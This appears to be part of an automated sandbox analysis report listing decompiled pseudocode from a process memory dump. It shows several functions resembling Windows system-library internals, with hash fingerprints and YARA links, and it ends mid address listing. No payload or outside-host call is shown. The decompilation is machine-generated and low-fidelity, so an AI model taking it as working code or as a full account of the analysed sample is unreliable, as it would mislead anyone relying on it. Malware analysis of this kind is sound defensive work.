                                                                  0x049937ad
                                                                  0x049937b0
                                                                  0x049937b2
                                                                  0x049937bc
                                                                  0x049937c2
                                                                  0x049937c2
                                                                  0x049937b2
                                                                  0x04939187
                                                                  0x04939187
                                                                  0x0493918a
                                                                  0x0493918d
                                                                  0x0493918f
                                                                  0x04939192
                                                                  0x04939195
                                                                  0x00000000
                                                                  0x04939195
                                                                  0x00000000
                                                                  0x04939187
                                                                  0x0499376a
                                                                  0x0499376a
                                                                  0x0499376c
                                                                  0x0499376c
                                                                  0x0499376f
                                                                  0x04993775
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04993777
                                                                  0x04993779
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04993782
                                                                  0x04993787
                                                                  0x04993789
                                                                  0x04993790
                                                                  0x04993790
                                                                  0x0499378b
                                                                  0x0499378b
                                                                  0x0499378b
                                                                  0x04993792
                                                                  0x04993795
                                                                  0x04993795
                                                                  0x04993798
                                                                  0x04993798
                                                                  0x0499379b
                                                                  0x0499379b
                                                                  0x049391a3
                                                                  0x049391a9
                                                                  0x049391b0
                                                                  0x049391b4
                                                                  0x049391b4
                                                                  0x049391bb
                                                                  0x049391c0
                                                                  0x049391c5
                                                                  0x049391c7
                                                                  0x049937da
                                                                  0x049391cd
                                                                  0x049391cd
                                                                  0x049391cd
                                                                  0x049391d2
                                                                  0x049391d5
                                                                  0x04939239
                                                                  0x04939239
                                                                  0x049391d7
                                                                  0x049391db
                                                                  0x049391e1
                                                                  0x049391e7
                                                                  0x049391fd
                                                                  0x04939203
                                                                  0x0493921e
                                                                  0x04939223
                                                                  0x00000000
                                                                  0x04939223
                                                                  0x04939205
                                                                  0x04939208
                                                                  0x0493920c
                                                                  0x04939214
                                                                  0x04939214
                                                                  0x049391e9
                                                                  0x049391e9
                                                                  0x049391ee
                                                                  0x049391f3
                                                                  0x049391f3
                                                                  0x049391f3
                                                                  0x049391e7
                                                                  0x00000000
                                                                  0x049391db
                                                                  0x04939187
                                                                  0x04939168

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72343bca57250e59db77062059aa995c4cbc90db33cbeefa749dd5ed1f727580
                                                                  • Instruction ID: 1a33f688f25e5048d235f476d3dc09fa3305338d7172a6dc6b02cff95222c63a
                                                                  • Opcode Fuzzy Hash: 72343bca57250e59db77062059aa995c4cbc90db33cbeefa749dd5ed1f727580
                                                                  • Instruction Fuzzy Hash: AF31E5B1A00244DFEB25EFACC588BACB7F6BB8A314F148669D40577240C3B4BD80CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04950050, Relevance: .1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 53%
                                                                  			E04950050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4a2d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04969ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0497B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04A08A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04969702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4a2b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                  0x04950055
                                                                  0x0495005d
                                                                  0x04950062
                                                                  0x0495006c
                                                                  0x0495006f
                                                                  0x04950074
                                                                  0x0495007a
                                                                  0x0495007a
                                                                  0x04950080
                                                                  0x04950080
                                                                  0x04950087
                                                                  0x0495008d
                                                                  0x0495008f
                                                                  0x04950093
                                                                  0x04950095
                                                                  0x0495009b
                                                                  0x049500f8
                                                                  0x049500fb
                                                                  0x049500fc
                                                                  0x049500ff
                                                                  0x04950108
                                                                  0x04950108
                                                                  0x049500a2
                                                                  0x049500a6
                                                                  0x049500b3
                                                                  0x049500bc
                                                                  0x049500c5
                                                                  0x049500ca
                                                                  0x0499c01e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0499c02d
                                                                  0x049500d5
                                                                  0x049500d9
                                                                  0x0499c03d
                                                                  0x0499c046
                                                                  0x0499c046
                                                                  0x049500df
                                                                  0x049500e2
                                                                  0x049500ea
                                                                  0x049500ef
                                                                  0x049500f2
                                                                  0x049500f6
                                                                  0x04950111
                                                                  0x04950117
                                                                  0x04950117
                                                                  0x00000000
                                                                  0x049500f6
                                                                  0x049500d0
                                                                  0x049500d0
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 10b24755e7069911c5540887afd89f2a12d703e9c62a3373534dabccabff4a86
                                                                  • Instruction ID: 13d0d23a99f292a7b8438ad428693f514e4ffe41c940ac53f157bd5a53267793
                                                                  • Opcode Fuzzy Hash: 10b24755e7069911c5540887afd89f2a12d703e9c62a3373534dabccabff4a86
                                                                  • Instruction Fuzzy Hash: C5318C31601B049FDB21CF28C944B96B3E5FF88718F24497DE89687AA0EB35BC01CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B6C0A, Relevance: .1, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 77%
                                                                  			E049B6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04957D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4a27b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04954620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0497F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04957D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04979AE0();
						_t23 = L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                  0x049b6c0a
                                                                  0x049b6c0f
                                                                  0x049b6c10
                                                                  0x049b6c13
                                                                  0x049b6c15
                                                                  0x049b6c19
                                                                  0x049b6c1c
                                                                  0x049b6c21
                                                                  0x049b6c28
                                                                  0x049b6c3a
                                                                  0x049b6c2a
                                                                  0x049b6c33
                                                                  0x049b6c33
                                                                  0x049b6c3f
                                                                  0x049b6c48
                                                                  0x049b6c4d
                                                                  0x049b6c60
                                                                  0x049b6c65
                                                                  0x049b6c69
                                                                  0x049b6c73
                                                                  0x049b6c79
                                                                  0x049b6c7f
                                                                  0x049b6c86
                                                                  0x049b6c90
                                                                  0x049b6c94
                                                                  0x049b6ca6
                                                                  0x049b6cb2
                                                                  0x049b6cbd
                                                                  0x049b6cbd
                                                                  0x049b6cc3
                                                                  0x049b6cc7
                                                                  0x049b6ccb
                                                                  0x049b6cd0
                                                                  0x049b6cd1
                                                                  0x049b6ce2
                                                                  0x049b6ce2
                                                                  0x049b6c69
                                                                  0x049b6ced

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4c42cbbf95134a1c3b105d330d788762ae7f93206f62c595552b79b6da18090
                                                                  • Instruction ID: 160b9e1c3fc66e3aaf736439bdc6703294d885aceb2517e161ab5dd8843e8147
                                                                  • Opcode Fuzzy Hash: f4c42cbbf95134a1c3b105d330d788762ae7f93206f62c595552b79b6da18090
                                                                  • Instruction Fuzzy Hash: 7621AD71600644AFD716DB68D940F6AB7B8FF48744F1400A9F945D77A1D634FD10CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049790AF, Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 82%
                                                                  			E049790AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0498D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0496E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04954620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0497F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0496A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                  0x049790af
                                                                  0x049790b8
                                                                  0x049790bb
                                                                  0x049790bf
                                                                  0x049790c2
                                                                  0x049790c2
                                                                  0x049790c8
                                                                  0x049790cb
                                                                  0x049790cd
                                                                  0x049b14d7
                                                                  0x049b14eb
                                                                  0x049b14eb
                                                                  0x00000000
                                                                  0x049b14eb
                                                                  0x049b14db
                                                                  0x049b14e6
                                                                  0x00000000
                                                                  0x049b14f2
                                                                  0x049b14e8
                                                                  0x00000000
                                                                  0x049b14e8
                                                                  0x049790d8
                                                                  0x049790da
                                                                  0x049790dd
                                                                  0x049790e5
                                                                  0x00000000
                                                                  0x04979139
                                                                  0x049790fa
                                                                  0x049790fe
                                                                  0x04979142
                                                                  0x00000000
                                                                  0x04979142
                                                                  0x04979104
                                                                  0x04979107
                                                                  0x0497910b
                                                                  0x04979110
                                                                  0x04979118
                                                                  0x04979147
                                                                  0x04979148
                                                                  0x0497914f
                                                                  0x04979150
                                                                  0x04979151
                                                                  0x04979152
                                                                  0x04979156
                                                                  0x0497915d
                                                                  0x04979160
                                                                  0x04979168
                                                                  0x0497916c
                                                                  0x049791bc
                                                                  0x049791be
                                                                  0x00000000
                                                                  0x049791be
                                                                  0x0497916e
                                                                  0x04979173
                                                                  0x04979176
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0497917c
                                                                  0x04979180
                                                                  0x049791b5
                                                                  0x00000000
                                                                  0x049791b5
                                                                  0x04979182
                                                                  0x04979185
                                                                  0x04979189
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0497918e
                                                                  0x04979190
                                                                  0x04979198
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049791a0
                                                                  0x00000000
                                                                  0x049791ad
                                                                  0x049791ad
                                                                  0x049791b0
                                                                  0x049791b1
                                                                  0x00000000
                                                                  0x04979185
                                                                  0x0497911a
                                                                  0x0497911c
                                                                  0x0497911f
                                                                  0x04979125
                                                                  0x04979127
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                  • Instruction ID: b9580a01284a1fc43fc310ba89b38f46c3f86523f7378b6821e9cffde483a391
                                                                  • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                  • Instruction Fuzzy Hash: 062165B5A00204EFEB20DF59C544E9AF7F9EB44754F14887AE945A7250D370FD50CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04963B7A, Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 59%
                                                                  			E04963B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4a284c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4a284c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04954620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4a284c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0497AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0497FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4a284c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4a284c4; // 0x0
					L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                  0x04963b89
                                                                  0x04963b96
                                                                  0x04963ba1
                                                                  0x04963bab
                                                                  0x04963bb5
                                                                  0x04963bb9
                                                                  0x049a6298
                                                                  0x04963bbf
                                                                  0x04963bc2
                                                                  0x04963bc3
                                                                  0x04963bc9
                                                                  0x04963bca
                                                                  0x04963bcc
                                                                  0x04963bcd
                                                                  0x04963bd4
                                                                  0x04963bd6
                                                                  0x04963bdb
                                                                  0x04963bea
                                                                  0x04963bf7
                                                                  0x04963bfb
                                                                  0x04963bff
                                                                  0x04963c09
                                                                  0x04963c0a
                                                                  0x04963c0b
                                                                  0x04963c0f
                                                                  0x04963c14
                                                                  0x04963c18
                                                                  0x04963c18
                                                                  0x04963bfb
                                                                  0x04963c1b
                                                                  0x04963c30
                                                                  0x04963c30
                                                                  0x04963c3d

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba920a8ec0a7067e9015f73f0404c5d86d371c9cf346856a1b27deced3b41111
                                                                  • Instruction ID: 2f06f1c2d2a7b59cd496447c7e7a43625dc2c927e8ef6ae60d005c2b4df81325
                                                                  • Opcode Fuzzy Hash: ba920a8ec0a7067e9015f73f0404c5d86d371c9cf346856a1b27deced3b41111
                                                                  • Instruction Fuzzy Hash: 25218E72A00508AFD714DF98CE81B6AB7BDFB44708F250578F909AB251D376BD12DB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B6CF0, Relevance: .1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 80%
                                                                  			E049B6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04957D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04957D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4915c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0496F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0496F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E049B7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04952400( &_v52);
								}
								_t21 = L04952400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                  0x049b6cfb
                                                                  0x049b6d00
                                                                  0x049b6d02
                                                                  0x049b6d06
                                                                  0x049b6d0a
                                                                  0x049b6d0e
                                                                  0x049b6d19
                                                                  0x049b6d2b
                                                                  0x049b6d1b
                                                                  0x049b6d24
                                                                  0x049b6d24
                                                                  0x049b6d33
                                                                  0x049b6d39
                                                                  0x049b6d46
                                                                  0x049b6d4f
                                                                  0x049b6d61
                                                                  0x049b6d51
                                                                  0x049b6d5a
                                                                  0x049b6d5a
                                                                  0x049b6d69
                                                                  0x049b6d6b
                                                                  0x049b6d6d
                                                                  0x049b6d6f
                                                                  0x049b6d6f
                                                                  0x049b6d74
                                                                  0x049b6d79
                                                                  0x049b6d7a
                                                                  0x049b6d7f
                                                                  0x049b6d82
                                                                  0x049b6d88
                                                                  0x049b6d89
                                                                  0x049b6d90
                                                                  0x049b6d94
                                                                  0x049b6da7
                                                                  0x049b6db1
                                                                  0x049b6db1
                                                                  0x049b6dbb
                                                                  0x049b6dbb
                                                                  0x049b6d90
                                                                  0x049b6d69
                                                                  0x049b6d46
                                                                  0x049b6dc6

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d1aa41017db52798ae84faf1783b51bb3196c30a613e1c5aba81d192428ba67b
                                                                  • Instruction ID: 0a4a7f67a920ee0ac9adb9327bca58412b8f95a580d7a32f558d986e5f349683
                                                                  • Opcode Fuzzy Hash: d1aa41017db52798ae84faf1783b51bb3196c30a613e1c5aba81d192428ba67b
                                                                  • Instruction Fuzzy Hash: 2221AF725046449BD711DF69CA44BABB7ECAFC1754F040976B98087261EB34FA08C6E2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A0070D, Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 67%
                                                                  			E04A0070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04A007DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E049FAFDE( &_v8,  &_v12);
					E04A01293(_t38, _v28, _t60);
					if(E04957D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E049F14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                  0x04a0071b
                                                                  0x04a00724
                                                                  0x04a00734
                                                                  0x04a00738
                                                                  0x04a0074b
                                                                  0x04a0074b
                                                                  0x04a00753
                                                                  0x04a00753
                                                                  0x04a00759
                                                                  0x04a0075d
                                                                  0x04a00774
                                                                  0x04a00779
                                                                  0x04a0077d
                                                                  0x04a00789
                                                                  0x04a00795
                                                                  0x04a007a7
                                                                  0x04a00797
                                                                  0x04a007a0
                                                                  0x04a007a0
                                                                  0x04a007af
                                                                  0x04a007c4
                                                                  0x04a007cd
                                                                  0x04a007cd
                                                                  0x04a007af
                                                                  0x04a007dc

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                  • Instruction ID: 6b79b8c870834c0fe0cb4cf88c4cfbac97a2d2d4274aabe9fa84cc442313ed74
                                                                  • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                  • Instruction Fuzzy Hash: 122104762086009FD705DF18E880B6ABBA5EFC4350F04C569F9958B381D734E909CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0495AE73, Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 96%
                                                                  			E0495AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04957D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04957D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04957D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04957D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E049B7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                  0x0495ae78
                                                                  0x0495ae7c
                                                                  0x0495ae7e
                                                                  0x0495ae81
                                                                  0x0495ae86
                                                                  0x0495ae8d
                                                                  0x049a2691
                                                                  0x0495ae93
                                                                  0x0495ae93
                                                                  0x0495ae93
                                                                  0x0495ae98
                                                                  0x0495ae9d
                                                                  0x049a26a2
                                                                  0x049a26b4
                                                                  0x049a26a4
                                                                  0x049a26ad
                                                                  0x049a26ad
                                                                  0x049a26b9
                                                                  0x00000000
                                                                  0x049a26bb
                                                                  0x00000000
                                                                  0x049a26bb
                                                                  0x0495aea3
                                                                  0x0495aea3
                                                                  0x0495aea3
                                                                  0x0495aeaa
                                                                  0x049a26c0
                                                                  0x049a26c9
